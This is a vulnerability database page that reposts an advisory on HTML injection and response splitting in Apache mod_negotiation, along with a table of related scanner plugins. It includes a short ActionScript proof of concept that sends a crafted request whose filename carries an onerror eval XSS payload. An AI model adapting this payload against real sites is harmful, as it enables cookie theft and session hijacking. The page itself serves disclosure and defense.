| Reporter | Title | Published | Views | Family All 73 |
|---|---|---|---|---|
| Apache mod_negotiation Multi-Line Filename Upload Vulnerabilities | 18 Nov 201100:00 | – | nessus | |
| CentOS 5 : httpd (CESA-2013:0130) | 17 Jan 201300:00 | – | nessus | |
| CentOS 6 : httpd (CESA-2013:0512) | 10 Mar 201300:00 | – | nessus | |
| F5 Networks BIG-IP : Apache HTTP server vulnerability (SOL17201) | 1 Sep 201500:00 | – | nessus | |
| Fedora 17 : httpd-2.2.23-1.fc17 (2013-1661) | 13 Feb 201300:00 | – | nessus | |
| GLSA-200803-19 : Apache: Multiple vulnerabilities | 13 Mar 200800:00 | – | nessus | |
| MiracleLinux 4 : httpd-2.2.15-26.0.1.AXS4 (AXSA:2013-123:02) | 16 Jan 202600:00 | – | nessus | |
| MiracleLinux 3 : httpd-2.2.3-76.0.1.AXS3 (AXSA:2013-45:01) | 16 Jan 202600:00 | – | nessus | |
| Oracle Linux 5 : httpd (ELSA-2013-0130) | 12 Jul 201300:00 | – | nessus | |
| Oracle Linux 6 : httpd (ELSA-2013-0512) | 12 Jul 201300:00 | – | nessus |
source: https://www.securityfocus.com/bid/27409/info
Apache 'mod_negotiation' is prone to an HTML-injection and an HTTP response-splitting vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, and influence or misrepresent how web content is served, cached, or interpreted; other attacks are also possible.
// Tested on IE 7 and FF 2.0.11, Flash plugin 9.0 r115
// Compile with flex compiler
package
{
import flash.display.Sprite;
import flash.net.*
public class TestXss extends flash.display.Sprite {
public function TestXss(){
var r:URLRequest = new URLRequest('http://victim/<img%20src=sa%20
onerror=eval(document.location.hash.substr(1))>#alert(123)');
r.method = 'POST';
r.data = unescape('test');
r.requestHeaders.push(new URLRequestHeader('Accept', 'image/jpeg; q=0'));
navigateToURL(r, '_self');
}
}
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation